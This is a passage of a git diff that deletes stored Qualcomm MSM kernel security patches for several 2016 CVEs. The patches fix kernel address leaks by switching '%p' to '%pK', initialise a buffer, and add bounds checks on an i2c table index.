-index 16acc47..2dc892c 100644
---- a/drivers/media/platform/msm/vidc/vidc_hfi.c
-+++ b/drivers/media/platform/msm/vidc/vidc_hfi.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -55,7 +55,7 @@ void vidc_hfi_deinitialize(enum msm_vidc_hfi_type hfi_type,
- 			struct hfi_device *hdev)
- {
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "%s invalid device %p", __func__, hdev);
-+		dprintk(VIDC_ERR, "%s invalid device %pK", __func__, hdev);
- 		return;
- 	}
- 
-diff --git a/drivers/media/platform/msm/vidc/vmem/vmem.c b/drivers/media/platform/msm/vidc/vmem/vmem.c
-index 3a2ac31..506121a 100644
---- a/drivers/media/platform/msm/vidc/vmem/vmem.c
-+++ b/drivers/media/platform/msm/vidc/vmem/vmem.c
-@@ -1,5 +1,4 @@
--/*
-- * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -127,7 +126,7 @@ static inline u32 __readl(void * __iomem addr)
- {
- 	u32 value = 0;
- 
--	pr_debug("read %p ", addr);
-+	pr_debug("read %pK ", addr);
- 	value = readl_relaxed(addr);
- 	pr_debug("-> %08x\n", value);
- 
-@@ -136,7 +135,7 @@ static inline u32 __readl(void * __iomem addr)
- 
- static inline void __writel(u32 val, void * __iomem addr)
- {
--	pr_debug("write %08x -> %p\n", val, addr);
-+	pr_debug("write %08x -> %pK\n", val, addr);
- 	writel_relaxed(val, addr);
- 	/*
- 	 * Commit all writes via a mem barrier, as subsequent __readl()
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6749/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6749/ANY/0001.patch
deleted file mode 100644
index 0eadbd3e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6749/ANY/0001.patch
+++ /dev/null
@@ -1,214 +0,0 @@
-From f9185dc83b92e7d1ee341e32e8cf5ed00a7253a7 Mon Sep 17 00:00:00 2001
-From: Divya Ponnusamy <pdivya@codeaurora.org>
-Date: Wed, 24 Aug 2016 17:06:54 +0530
-Subject: msm: kgsl: Change %p to %pK in debug messages
-
-The format specifier %p can leak kernel addresses
-while not valuing the kptr_restrict system settings.
-Use %pK instead of %p, which evaluates whether
-kptr_restrict is set.
-
-Change-Id: I0778e43e0a03852ca2944377256a7b401586a747
-Signed-off-by: Divya Ponnusamy <pdivya@codeaurora.org>
----
- drivers/gpu/msm/adreno_debugfs.c |  4 ++--
- drivers/gpu/msm/kgsl.c           |  5 ++---
- drivers/gpu/msm/kgsl_cffdump.c   |  9 +--------
- drivers/gpu/msm/kgsl_cmdbatch.c  |  4 ++--
- drivers/gpu/msm/kgsl_iommu.c     | 19 +++++++++----------
- drivers/gpu/msm/kgsl_pwrctrl.c   |  4 ++--
- drivers/gpu/msm/kgsl_snapshot.c  |  5 +----
- 7 files changed, 19 insertions(+), 31 deletions(-)
-
-diff --git a/drivers/gpu/msm/adreno_debugfs.c b/drivers/gpu/msm/adreno_debugfs.c
-index 9c045b5..7628285 100644
---- a/drivers/gpu/msm/adreno_debugfs.c
-+++ b/drivers/gpu/msm/adreno_debugfs.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2002,2008-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2002,2008-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -83,7 +83,7 @@ static void sync_event_print(struct seq_file *s,
- 		break;
- 	}
- 	case KGSL_CMD_SYNCPOINT_TYPE_FENCE:
--		seq_printf(s, "sync: [%p] %s", sync_event->handle,
-+		seq_printf(s, "sync: [%pK] %s", sync_event->handle,
- 		(sync_event->handle && sync_event->handle->fence)
- 				? sync_event->handle->fence->name : "NULL");
- 		break;
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 4c3753e..18cc267 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -4131,9 +4131,8 @@ int kgsl_device_platform_probe(struct kgsl_device *device)
- 	disable_irq(device->pwrctrl.interrupt_num);
- 
- 	KGSL_DRV_INFO(device,
--		"dev_id %d regs phys 0x%08lx size 0x%08x virt %p\n",
--		device->id, device->reg_phys, device->reg_len,
--		device->reg_virt);
-+		"dev_id %d regs phys 0x%08lx size 0x%08x\n",
-+		device->id, device->reg_phys, device->reg_len);
- 
- 	rwlock_init(&device->context_lock);
- 
-diff --git a/drivers/gpu/msm/kgsl_cffdump.c b/drivers/gpu/msm/kgsl_cffdump.c
-index 1f10a33..67e3d02 100644
---- a/drivers/gpu/msm/kgsl_cffdump.c
-+++ b/drivers/gpu/msm/kgsl_cffdump.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -515,10 +515,6 @@ EXPORT_SYMBOL(kgsl_cffdump_waitirq);
- static int subbuf_start_handler(struct rchan_buf *buf,
- 	void *subbuf, void *prev_subbuf, size_t prev_padding)
- {
--	pr_debug("kgsl: cffdump: subbuf_start_handler(subbuf=%p, prev_subbuf"
--		"=%p, prev_padding=%08zx)\n", subbuf, prev_subbuf,
--		 prev_padding);
--
- 	if (relay_buf_full(buf)) {
- 		if (!suspended) {
- 			suspended = 1;
-@@ -575,9 +571,6 @@ static struct rchan *create_channel(unsigned subbuf_size, unsigned n_subbufs)
- {
- 	struct rchan *chan;
- 
--	pr_info("kgsl: cffdump: relay: create_channel: subbuf_size %u, "
--		"n_subbufs %u, dir 0x%p\n", subbuf_size, n_subbufs, dir);
--
- 	chan = relay_open("cpu", dir, subbuf_size,
- 			  n_subbufs, &relay_callbacks, NULL);
- 	if (!chan) {
-diff --git a/drivers/gpu/msm/kgsl_cmdbatch.c b/drivers/gpu/msm/kgsl_cmdbatch.c
-index 46e053f..7dfd691 100644
---- a/drivers/gpu/msm/kgsl_cmdbatch.c
-+++ b/drivers/gpu/msm/kgsl_cmdbatch.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -92,7 +92,7 @@ void kgsl_dump_syncpoints(struct kgsl_device *device,
- 		}
- 		case KGSL_CMD_SYNCPOINT_TYPE_FENCE:
- 			if (event->handle)
--				dev_err(device->dev, "  fence: [%p] %s\n",
-+				dev_err(device->dev, "  fence: [%pK] %s\n",
- 					event->handle->fence,
- 					event->handle->name);
- 			else
-diff --git a/drivers/gpu/msm/kgsl_iommu.c b/drivers/gpu/msm/kgsl_iommu.c
-index 249df4d..f510ac4 100644
---- a/drivers/gpu/msm/kgsl_iommu.c
-+++ b/drivers/gpu/msm/kgsl_iommu.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -612,7 +612,7 @@ static void kgsl_detach_pagetable_iommu_domain(struct kgsl_mmu *mmu)
- 			iommu_detach_device(iommu_pt->domain, ctx->dev);
- 			ctx->attached = false;
- 			KGSL_MEM_INFO(mmu->device,
--				"iommu %p detached from user dev of MMU: %p\n",
-+				"iommu %pK detached from user dev of MMU: %pK\n",
- 				iommu_pt->domain, mmu);
- 		}
- 	}
-@@ -700,7 +700,7 @@ static int kgsl_attach_pagetable_iommu_domain(struct kgsl_mmu *mmu)
- 		}
- 		ctx->attached = true;
- 		KGSL_MEM_INFO(mmu->device,
--				"iommu pt %p attached to dev %p, ctx_id %d\n",
-+				"iommu pt %pK attached to dev %pK, ctx_id %d\n",
- 				iommu_pt->domain, ctx->dev, ctx->ctx_id);
- 		if (KGSL_IOMMU_CONTEXT_SECURE != i) {
- 			ret = iommu_domain_get_attr(iommu_pt->domain,
-@@ -1108,8 +1108,8 @@ kgsl_iommu_unmap(struct kgsl_pagetable *pt,
- 		unmapped = iommu_unmap(iommu_pt->domain, gpuaddr, range);
- 	if (unmapped != range) {
- 		KGSL_CORE_ERR(
--			"iommu_unmap(%p, %llx, %lld) failed with unmapped size: %zd\n",
--			iommu_pt->domain, gpuaddr, range, unmapped);
-+			"iommu_unmap(%llx, %lld) failed with unmapped size: %zd\n",
-+			gpuaddr, range, unmapped);
- 		return -EINVAL;
- 	}
- 
-@@ -1237,8 +1237,8 @@ int _iommu_add_guard_page(struct kgsl_pagetable *pt,
- 				protflags & ~IOMMU_WRITE);
- 		if (ret) {
- 			KGSL_CORE_ERR(
--			"iommu_map(%p, addr %016llX, flags %x) err: %d\n",
--			iommu_pt->domain, gpuaddr, protflags & ~IOMMU_WRITE,
-+			"iommu_map(addr %016llX, flags %x) err: %d\n",
-+			gpuaddr, protflags & ~IOMMU_WRITE,
- 			ret);
- 			return ret;
- 		}
-@@ -1306,9 +1306,8 @@ kgsl_iommu_map(struct kgsl_pagetable *pt,
- 	}
- 
- 	if (mapped != size) {
--		KGSL_CORE_ERR("iommu_map_sg(%p, %016llX, %lld, %x) err: %zd\n",
--				iommu_pt->domain, addr, size,
--				flags, mapped);
-+		KGSL_CORE_ERR("iommu_map_sg(%016llX, %lld, %x) err: %zd\n",
-+				addr, size,	flags, mapped);
- 		return -ENODEV;
- 	}
- 
-diff --git a/drivers/gpu/msm/kgsl_pwrctrl.c b/drivers/gpu/msm/kgsl_pwrctrl.c
-index 1c89d74..f50e6d7 100644
---- a/drivers/gpu/msm/kgsl_pwrctrl.c
-+++ b/drivers/gpu/msm/kgsl_pwrctrl.c
-@@ -1593,7 +1593,7 @@ int kgsl_pwrctrl_init(struct kgsl_device *device)
- 
- 		if (!pwr->ocmem_pcl) {
- 			KGSL_PWR_ERR(device,
--				"msm_bus_scale_register_client failed: id %d table %p",
-+				"msm_bus_scale_register_client failed: id %d table %pK",
- 				device->id, ocmem_scale_table);
- 			result = -EINVAL;
- 			goto done;
-@@ -1643,7 +1643,7 @@ int kgsl_pwrctrl_init(struct kgsl_device *device)
- 				(pdata->bus_scale_table);
- 		if (!pwr->pcl) {
- 			KGSL_PWR_ERR(device,
--				"msm_bus_scale_register_client failed: id %d table %p",
-+				"msm_bus_scale_register_client failed: id %d table %pK",
- 				device->id, pdata->bus_scale_table);
- 			result = -EINVAL;
- 			goto done;
-diff --git a/drivers/gpu/msm/kgsl_snapshot.c b/drivers/gpu/msm/kgsl_snapshot.c
-index 42eabe4..bbfd8a7 100644
---- a/drivers/gpu/msm/kgsl_snapshot.c
-+++ b/drivers/gpu/msm/kgsl_snapshot.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1120,9 +1120,6 @@ void kgsl_snapshot_save_frozen_objs(struct work_struct *work)
- 		goto done;
- 
- 	snapshot->mempool = vmalloc(size);
--	if (snapshot->mempool != NULL)
--		KGSL_CORE_ERR("snapshot: mempool address %p, size %zx\n",
--				snapshot->mempool, size);
- 
- 	ptr = snapshot->mempool;
- 	snapshot->mempool_size = 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6750/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6750/ANY/0001.patch
deleted file mode 100644
index f492aa47..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6750/ANY/0001.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-From 34bda711a1c7bc7f9fd7bea3a5be439ed00577e5 Mon Sep 17 00:00:00 2001
-From: Karthikeyan Ramasubramanian <kramasub@codeaurora.org>
-Date: Tue, 16 Aug 2016 11:24:00 -0600
-Subject: soc: qcom: smp2p: Fix kernel address leak
-
-Change format string to %pK instead of %p in the debug statements. This
-change fixes kernel address leaks from the usage of %p.
-
-CRs-Fixed: 1052825
-Change-Id: Ib95f691919a2977f5436cd4c6ac4a002d70dd729
-Signed-off-by: Chris Lew <clew@codeaurora.org>
-Signed-off-by: Karthikeyan Ramasubramanian <kramasub@codeaurora.org>
----
- drivers/gpio/gpio-msm-smp2p.c        | 2 +-
- drivers/soc/qcom/smp2p.c             | 6 +++---
- drivers/soc/qcom/smp2p_debug.c       | 4 ++--
- drivers/soc/qcom/smp2p_test_common.h | 5 +++--
- 4 files changed, 9 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/gpio/gpio-msm-smp2p.c b/drivers/gpio/gpio-msm-smp2p.c
-index bde81f0..b426a80 100644
---- a/drivers/gpio/gpio-msm-smp2p.c
-+++ b/drivers/gpio/gpio-msm-smp2p.c
-@@ -368,7 +368,7 @@ static int smp2p_irq_map(struct irq_domain *domain_ptr, unsigned int virq,
- 
- 	chip = domain_ptr->host_data;
- 	if (!chip) {
--		SMP2P_ERR("%s: invalid domain ptr %p\n", __func__, domain_ptr);
-+		SMP2P_ERR("%s: invalid domain ptr\n", __func__);
- 		return -ENODEV;
- 	}
- 
-diff --git a/drivers/soc/qcom/smp2p.c b/drivers/soc/qcom/smp2p.c
-index fc5688b..79b8ffb 100644
---- a/drivers/soc/qcom/smp2p.c
-+++ b/drivers/soc/qcom/smp2p.c
-@@ -1,6 +1,6 @@
- /* drivers/soc/qcom/smp2p.c
-  *
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -519,8 +519,8 @@ static void smp2p_find_entry_v1(struct smp2p_smem __iomem *item,
- 	char entry_name[SMP2P_MAX_ENTRY_NAME];
- 
- 	if (!item || !name || !entry_ptr) {
--		SMP2P_ERR("%s: invalid arguments %p, %p, %p\n",
--				__func__, item, name, entry_ptr);
-+		SMP2P_ERR("%s: invalid arguments %d %d %d\n",
-+				__func__, !item, !name, !entry_ptr);
- 		return;
- 	}
- 
-diff --git a/drivers/soc/qcom/smp2p_debug.c b/drivers/soc/qcom/smp2p_debug.c
-index 4deb05a..8d98d07 100644
---- a/drivers/soc/qcom/smp2p_debug.c
-+++ b/drivers/soc/qcom/smp2p_debug.c
-@@ -1,6 +1,6 @@
- /* drivers/soc/qcom/smp2p_debug.c
-  *
-- * Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2014,2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -41,7 +41,7 @@ static void smp2p_int_stats(struct seq_file *s)
- 				pid != SMP2P_REMOTE_MOCK_PROC)
- 			continue;
- 
--		seq_printf(s, "| %5s (%d) | %11u | %10u | %10u | %p | %08x |\n",
-+		seq_printf(s, "| %5s (%d) | %11u | %10u | %10u | %pK | %08x |\n",
- 			int_cfg[pid].name,
- 			pid, int_cfg[pid].in_int_id,
- 			int_cfg[pid].in_interrupt_count,
-diff --git a/drivers/soc/qcom/smp2p_test_common.h b/drivers/soc/qcom/smp2p_test_common.h
-index 747a812..3be519b 100644
---- a/drivers/soc/qcom/smp2p_test_common.h
-+++ b/drivers/soc/qcom/smp2p_test_common.h
-@@ -1,6 +1,6 @@
- /* drivers/soc/qcom/smp2p_test_common.h
-  *
-- * Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2014,2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -49,7 +49,8 @@
- 	void *a_tmp = (a); \
- 	void *b_tmp = (b); \
- 	if (!((a_tmp)cmp(b_tmp))) { \
--		seq_printf(s, "%s:%d Fail: " #a "(%p) " #cmp " " #b "(%p)\n", \
-+		seq_printf(s, "%s:%d Fail: " #a "(%pK) " #cmp \
-+				" " #b "(%pK)\n", \
- 				__func__, __LINE__, \
- 				a_tmp, b_tmp); \
- 		failed = 1; \
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6751/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6751/ANY/0001.patch
deleted file mode 100644
index c424fb7e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6751/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 4907b74ecd5ef8c6d85f1b430f386e381d5b8229 Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Wed, 7 Sep 2016 16:28:50 +0800
-Subject: ASoC: msm: initialize the params array before using it
-
-The params array is used without initialization, which may cause
-security issues. Initialize it as all zero after the definition.
-
-CRs-Fixed: 1062271
-Change-Id: If462fe3d82f139d72547f82dc7eb564f83cb35bf
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-index 26528e6..58a4de5 100644
---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-@@ -1024,6 +1024,7 @@ static int msm_compr_ioctl_shared(struct snd_pcm_substream *substream,
- 			struct snd_dec_ddp *ddp =
- 				&compr->info.codec_param.codec.options.ddp;
- 			uint32_t params_length = 0;
-+			memset(params_value, 0, MAX_AC3_PARAM_SIZE);
- 			/* check integer overflow */
- 			if (ddp->params_length > UINT_MAX/sizeof(int)) {
- 				pr_err("%s: Integer overflow ddp->params_length %d\n",
-@@ -1064,6 +1065,7 @@ static int msm_compr_ioctl_shared(struct snd_pcm_substream *substream,
- 			struct snd_dec_ddp *ddp =
- 				&compr->info.codec_param.codec.options.ddp;
- 			uint32_t params_length = 0;
-+			memset(params_value, 0, MAX_AC3_PARAM_SIZE);
- 			/* check integer overflow */
- 			if (ddp->params_length > UINT_MAX/sizeof(int)) {
- 				pr_err("%s: Integer overflow ddp->params_length %d\n",
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6752/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6752/ANY/0001.patch
deleted file mode 100644
index fdeef302..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6752/ANY/0001.patch
+++ /dev/null
@@ -1,109 +0,0 @@
-From 0de2c7600c8f1f0152a2f421c6593f931186400a Mon Sep 17 00:00:00 2001
-From: Mallikarjuna Reddy Amireddy <mamire@codeaurora.org>
-Date: Mon, 25 Jul 2016 18:14:39 +0530
-Subject: qseecom: Change format specifier %p to %pK
-
-Format specifier %p can leak kernel addresses while not valuing the
-kptr_restrict system settings. When kptr_restrict is set to (1), kernel
-pointers printed using the %pK format specifier will be replaced with 0's.
-So that %pK will not leak kernel pointers to unprivileged users.
-So change the format specifier from %p to %pK.
-
-Debugging Note : &pK prints only Zeros as address. if you need actual
-address information, pls echo 0 to kptr_restrict.
-$ echo 0 > /proc/sys/kernel/kptr_restrict
-
-Change-Id: I0baf2be2d5a476e2e4267f20b99d0ddf5492469e
-Signed-off-by: Mallikarjuna Reddy Amireddy <mamire@codeaurora.org>
----
- drivers/misc/qseecom.c | 18 +++++++++---------
- 1 file changed, 9 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 52034c7..4fab447 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1133,7 +1133,7 @@ static int qseecom_set_client_mem_param(struct qseecom_dev_handle *data,
- 
- 	if ((req.ifd_data_fd <= 0) || (req.virt_sb_base == NULL) ||
- 					(req.sb_len == 0)) {
--		pr_err("Inavlid input(s)ion_fd(%d), sb_len(%d), vaddr(0x%p)\n",
-+		pr_err("Inavlid input(s)ion_fd(%d), sb_len(%d), vaddr(0x%pK)\n",
- 			req.ifd_data_fd, req.sb_len, req.virt_sb_base);
- 		return -EFAULT;
- 	}
-@@ -1653,7 +1653,7 @@ int __qseecom_process_rpmb_svc_cmd(struct qseecom_dev_handle *data_ptr,
- 	void *req_buf = NULL;
- 
- 	if ((req_ptr == NULL) || (send_svc_ireq_ptr == NULL)) {
--		pr_err("Error with pointer: req_ptr = %p, send_svc_ptr = %p\n",
-+		pr_err("Error with pointer: req_ptr = %pK, send_svc_ptr = %pK\n",
- 			req_ptr, send_svc_ireq_ptr);
- 		return -EINVAL;
- 	}
-@@ -1700,7 +1700,7 @@ int __qseecom_process_fsm_key_svc_cmd(struct qseecom_dev_handle *data_ptr,
- 	uint32_t reqd_len_sb_in = 0;
- 
- 	if ((req_ptr == NULL) || (send_svc_ireq_ptr == NULL)) {
--		pr_err("Error with pointer: req_ptr = %p, send_svc_ptr = %p\n",
-+		pr_err("Error with pointer: req_ptr = %pK, send_svc_ptr = %pK\n",
- 			req_ptr, send_svc_ireq_ptr);
- 		return -EINVAL;
- 	}
-@@ -3025,7 +3025,7 @@ int qseecom_send_command(struct qseecom_handle *handle, void *send_buf,
- 	if (ret)
- 		return ret;
- 
--	pr_debug("sending cmd_req->rsp size: %u, ptr: 0x%p\n",
-+	pr_debug("sending cmd_req->rsp size: %u, ptr: 0x%pK\n",
- 			req.resp_len, req.resp_buf);
- 	return ret;
- }
-@@ -4844,7 +4844,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			ret = -EINVAL;
- 			break;
- 		}
--		pr_debug("SET_MEM_PARAM: qseecom addr = 0x%p\n", data);
-+		pr_debug("SET_MEM_PARAM: qseecom addr = 0x%pK\n", data);
- 		ret = qseecom_set_client_mem_param(data, argp);
- 		if (ret)
- 			pr_err("failed Qqseecom_set_mem_param request: %d\n",
-@@ -4860,7 +4860,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			break;
- 		}
- 		data->type = QSEECOM_CLIENT_APP;
--		pr_debug("LOAD_APP_REQ: qseecom_addr = 0x%p\n", data);
-+		pr_debug("LOAD_APP_REQ: qseecom_addr = 0x%pK\n", data);
- 		mutex_lock(&app_access_lock);
- 		atomic_inc(&data->ioctl_count);
- 		if (qseecom.qsee_version > QSEEE_VERSION_00) {
-@@ -4886,7 +4886,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			ret = -EINVAL;
- 			break;
- 		}
--		pr_debug("UNLOAD_APP: qseecom_addr = 0x%p\n", data);
-+		pr_debug("UNLOAD_APP: qseecom_addr = 0x%pK\n", data);
- 		mutex_lock(&app_access_lock);
- 		atomic_inc(&data->ioctl_count);
- 		ret = qseecom_unload_app(data, false);
-@@ -5017,7 +5017,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		data->type = QSEECOM_CLIENT_APP;
- 		mutex_lock(&app_access_lock);
- 		atomic_inc(&data->ioctl_count);
--		pr_debug("APP_LOAD_QUERY: qseecom_addr = 0x%p\n", data);
-+		pr_debug("APP_LOAD_QUERY: qseecom_addr = 0x%pK\n", data);
- 		ret = qseecom_query_app_loaded(data, argp);
- 		atomic_dec(&data->ioctl_count);
- 		mutex_unlock(&app_access_lock);
-@@ -5288,7 +5288,7 @@ static int qseecom_release(struct inode *inode, struct file *file)
- 	int ret = 0;
- 
- 	if (data->released == false) {
--		pr_debug("data: released=false, type=%d, mode=%d, data=0x%p\n",
-+		pr_debug("data: released=false, type=%d, mode=%d, data=0x%pK\n",
- 			data->type, data->mode, data);
- 		switch (data->type) {
- 		case QSEECOM_LISTENER_SERVICE:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6753/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6753/ANY/0001.patch
deleted file mode 100644
index 94530915..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6753/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 5ee75a32931dc70a7af2be42650ac5f14db99674 Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers <ndesaulniers@google.com>
-Date: Mon, 12 Sep 2016 15:47:42 -0700
-Subject: cgroup: prefer %pK to %p
-
-Prevents leaking kernel pointers when using kptr_restrict.
-
-Bug: 30149174
-Change-Id: I0fa3cd8d4a0d9ea76d085bba6020f1eda073c09b
-Git-repo: https://android.googlesource.com/kernel/msm.git
-Git-commit: 505e48f32f1321ed7cf80d49dd5f31b16da445a8
-Signed-off-by: Srinivasa Rao Kuppala <srkupp@codeaurora.org>
----
- kernel/cgroup.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/kernel/cgroup.c b/kernel/cgroup.c
-index 05b36e7..1e2c358 100644
---- a/kernel/cgroup.c
-+++ b/kernel/cgroup.c
-@@ -5449,7 +5449,7 @@ static int cgroup_css_links_read(struct cgroup *cont,
- 		struct css_set *cg = link->cg;
- 		struct task_struct *task;
- 		int count = 0;
--		seq_printf(seq, "css_set %p\n", cg);
-+		seq_printf(seq, "css_set %pK\n", cg);
- 		list_for_each_entry(task, &cg->tasks, cg_list) {
- 			if (count++ > MAX_TASKS_SHOWN_PER_CSS) {
- 				seq_puts(seq, "  ...\n");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6755/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6755/3.10/0001.patch
deleted file mode 100644
index 63320d9e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6755/3.10/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From b5df02edbcdf53dbbab77903d28162772edcf6e0 Mon Sep 17 00:00:00 2001
-From: Suman Mukherjee <sumam@codeaurora.org>
-Date: Thu, 22 Sep 2016 09:06:48 +0530
-Subject: msm: sensor: validate the i2c table index before use
-
-Verifying the i2c table index value before accessing
-the i2c table to avoid memory corruption issues.
-CRs-Fixed: 1065916
-
-Change-Id: I0e31c22f90006f27a77cd420288334b8355cee95
-Signed-off-by: Sureshnaidu Laveti <lsuresh@codeaurora.org>
-Signed-off-by: Suman Mukherjee <sumam@codeaurora.org>
----
- .../platform/msm/camera_v2/sensor/actuator/msm_actuator.c  | 14 +++++++++-----
- 1 file changed, 9 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index 1f4eaa1..bebe691 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -91,11 +91,6 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- 	struct msm_camera_i2c_reg_array *i2c_tbl = a_ctrl->i2c_reg_tbl;
- 	CDBG("Enter\n");
- 	for (i = 0; i < size; i++) {
--		/* check that the index into i2c_tbl cannot grow larger that
--		the allocated size of i2c_tbl */
--		if ((a_ctrl->total_steps + 1) < (a_ctrl->i2c_tbl_index)) {
--			break;
--		}
- 		if (write_arr[i].reg_write_type == MSM_ACTUATOR_WRITE_DAC) {
- 			value = (next_lens_position <<
- 				write_arr[i].data_shift) |
-@@ -109,6 +104,11 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- 					i2c_byte2 = value & 0xFF;
- 					CDBG("byte1:0x%x, byte2:0x%x\n",
- 						i2c_byte1, i2c_byte2);
-+					if (a_ctrl->i2c_tbl_index >
-+						a_ctrl->total_steps) {
-+						pr_err("failed:i2c table index out of bound\n");
-+						break;
-+					}
- 					i2c_tbl[a_ctrl->i2c_tbl_index].
- 						reg_addr = i2c_byte1;
- 					i2c_tbl[a_ctrl->i2c_tbl_index].
-@@ -129,6 +129,10 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- 			i2c_byte2 = (hw_dword & write_arr[i].hw_mask) >>
- 				write_arr[i].hw_shift;
- 		}
-+		if (a_ctrl->i2c_tbl_index > a_ctrl->total_steps) {
-+			pr_err("failed: i2c table index out of bound\n");
-+			break;
-+		}
- 		CDBG("i2c_byte1:0x%x, i2c_byte2:0x%x\n", i2c_byte1, i2c_byte2);
- 		i2c_tbl[a_ctrl->i2c_tbl_index].reg_addr = i2c_byte1;
- 		i2c_tbl[a_ctrl->i2c_tbl_index].reg_data = i2c_byte2;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6755/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6755/3.18/0002.patch
deleted file mode 100644
index d6da36b4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6755/3.18/0002.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 652c8005752b28c22107e928c28aabce1dfdde84 Mon Sep 17 00:00:00 2001
-From: Sureshnaidu Laveti <lsuresh@codeaurora.org>
